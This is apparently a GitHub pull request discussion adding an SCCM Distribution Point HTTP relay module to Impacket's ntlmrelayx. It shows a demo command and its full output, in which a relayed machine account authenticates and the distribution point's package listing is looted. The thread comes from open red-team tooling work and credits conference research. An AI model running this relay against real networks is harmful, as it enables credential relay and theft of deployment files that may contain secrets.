feat: ✨ Adding SCCM Distribution Point (HTTP) to NTLMRelayx

[ar0dd]

This PR adds an SCCM attack primitive presented at the Red Team Village in DEFCON32.

TL;DR - You can authenticate to the HTTP service of a Config Manager (SCCM) Distribution point, and extract all of the packages there.

This PR adds:

• New --sccm module - You're able to NTLM relay to the HTTP service of the distrubition point if authentication is enabled. If authentication is not enabled (Anonymous Authentication enabled), check out sccm-http-looter
• modified ntlmrelayx.py in the examples scripts
• Few other edits

I tried following existing ADCS (ESC8 related) codebase that are in the master branch

Happy to make it more robust if needed. :)

Demo

└─# python3 examples/ntlmrelayx.py -t http://10.2.10.12/SMS_DP_SMSPKG$/Datalib --sccm --sccm-dp-dump -smb2support
Impacket v0.12.0.dev1+20240801.104651.6d8dd858 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.2.10.13, attacking target http://10.2.10.12
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.2.10.12 as LUDUS/SCCM-SQL$ SUCCEED
[*] Dumping SCCM Distribution Point Files
[*] Getting Datalib listing...
[*] Getting Datalib listing from http://10.2.10.12/SMS_DP_SMSPKG$/Datalib...
[*] Data saved to 10.2.10.12_sccm_dump/Datalib.txt
[*] Extracting file names from Datalib listing...
[*] Getting file signatures...
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.2.10.13 controlled, but there are no more targets left!
[*] SCCM DP Looting complete!

[anadrianmanrique]

Hi @ar0dd! Regarding #1832, do you think it could improved based on the implementation of this PR? I think it would be nice if you could provide feedback on that implementation as some of that code was inspired in yours. Let me know your thoughts. Thank you!

[ar0dd]

Hi @anadrianmanrique ,

I don't see anything wrong with their implementation.

I drew inspiration from this one so it could be easier for you guys to merge in: #1425

Right now it seems like #1832 and I are pulling DP files two different ways. Ideally we would use both methods (check for one - if that doesn't work, use signatures).

Up to you guys. I'm not married to my PR and I don't care for the credit.

Whatever you guys need to do and whatever is best for impacket works for me :)

This research was originally done by Erik Hunstad from badsectorlabs.

[anadrianmanrique]

Thank you for your feedback! Merged on #1832